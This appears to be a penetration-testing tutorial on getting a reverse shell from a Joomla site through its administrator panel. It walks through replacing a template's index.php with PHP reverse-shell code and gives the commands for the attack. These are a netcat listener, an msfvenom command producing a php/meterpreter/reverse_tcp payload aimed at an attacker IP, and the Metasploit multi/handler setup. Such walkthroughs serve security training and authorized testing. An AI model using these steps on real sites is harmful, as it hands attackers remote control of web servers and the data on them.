Joomla is one of the popular Content Management System (CMS) which helps you to build your website. Joomla has gained its popularity by being user friendly as its complication free when during installation; and it is also pretty reliable. In this article, we learn how to get reverse shell of joomla.
As you can see in the image below, that the website is made in joomla. Now, that we have our joomla environment we start exploiting it.
The attack that we are going to show is categorises under post exploitation; which means one should have log in credentials of joomla. The URL of log in page of joomla will be consisted of ‘joomla/admministrator’ and here, enter username and password as shown in the image below :
Once you are logged in, go to extensions. A drop down menu will appear, from this menu select templates; just like it has been shown in the image belolw :
Implementing the above will show you the list of templates present in the website and so we will exploit one of them i.e. Beez3 details and files.
Once, you are in the template, go to index.php as shown in the image below :
This way you will able to edit index.php in the template as you can see in the image below :
Now, swap the code of index.php with the reverse shell code i.e. found in kali linux and add your ip and port in the code just like it has been shown in the image below :
Now, activate netcat to get a session with the following command :
nc -lvp 1234
Another way to get a reverse shell is by msfvenom, and for this type the following command :
msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R
The above command will give you the malicious php code. Swap this code just like before and simultaneously start the multi/handler as shown in the image below :
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.9
set lport 1234
exploit
These were the two ways to get reverse shell in joomla.